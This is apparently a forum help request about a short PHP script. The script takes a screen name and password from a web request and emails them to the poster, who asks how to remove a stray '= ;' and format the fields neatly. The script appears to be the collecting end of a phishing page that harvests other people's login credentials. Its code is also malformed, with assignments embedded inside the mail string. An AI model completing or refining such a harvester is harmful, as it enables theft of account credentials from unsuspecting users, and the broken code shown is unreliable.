I got it to send me the email and have the subject and everything but when it sends the email it it gives me the info but adds a "= ;" to the end of the information.. is there a way to stop that? And maybe make it send it like
Username = blah
Password = blah
<?php
mail("myemail.com", " Info", "$Screenname= $_REQUEST['Screenname'];
$Password= $_REQUEST['Password']; ");
?>